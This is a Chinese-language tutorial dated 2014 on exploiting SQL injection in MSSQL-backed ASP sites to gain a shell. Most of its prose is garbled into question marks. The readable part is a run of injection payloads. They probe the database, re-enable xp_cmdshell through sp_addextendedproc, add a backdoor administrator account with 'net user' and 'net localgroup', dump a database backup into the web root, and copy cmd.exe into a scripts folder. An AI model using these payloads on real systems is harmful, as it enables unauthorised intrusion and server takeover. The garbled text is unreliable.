???????????????????
???????????? ???????[ 2014/5/26 13:22:32 ] ??????????????? ??????? ???????
????????????????????????????????????????????????????????????????shell?????????????????????????????
????????????????????и??·???????????ɡ??????????????·?????????£?
?????ж?????sql????????sql???????ж???????????????mssqlserver????洢????xp_cmdshell ????????????????б??????????????????????????xp_cmdshell ?洢?????????????????
?????ж??????????????????????asp????仰?????????webshell?????????webshell??????shell??
?????????????sa?????????·???????
????????????·?????濪?????
?????????????·???
??????????ж?????sql??????????????????ù????????裬????????????webcruiser????????С?????????????????????????sql??????????????????????????????????????????????????????????????sql?????????????xp_cmdshell??
???????巽???????????
?????????????????
?????Id=1234;and (select count(*) from sysobjects)>0
?????????????????????????????????sa?????
?????id=1234;and user>0 (?????dbo ?????sa)??
?????id=1234;and db_name()>0?????????????????????????????????
??????xp_cmdshell??????á?
?????id=1234;and (select count(*) from master.dbo.sysobjects where xtype=”X” and name =’xp_cmdshell’)
??????洢?????????????????
?????id=1234;and exec sp_addextendedproc xp_cmdshell??’xplog70.dll’
???????????????????????????·?????
????l ?????? DLL xpsql70.dll ???DLL ?????????DLL?????126 (???????????)??
??????????У?exec sp_dropextendedproc “xp_cmdshell” ????????sp_addextendedproc “xp_cmdshell”??”xpsql70.dll”
????l ??????xpweb70.dll ?????????xp_cmdshell ???127
??????????? exec sp_dropextendedproc “xp_cmdshell” ???????? exec sp_addextendedproc “xp_cmdshell”??”xpweb70.dll”
??????????洢?????????????????????
?????id=1234 ;exec master..xp_cmdshell “net user aaa bbb /add ”-- ????aaa????????bbb?????
??????????????飺
?????id=1234 ;exec master..xp_cmdshell “net localgroup administrators aaa/add ”
?????????????????????
?????id=1234 ;exec backup database ??????? to disk =’C:inetpub/wwwrootsave.db’?????????????web????·????
????????????web????·?????????????????????unicode ???????????????????
?????id=1234;exec master..xp_cmdshell “copy c:windowssystem32cmd.exe c:inetpubscriptscmd.exe”
??????????????????xp_cmdshell ???????????????е?????????????????????????
??????
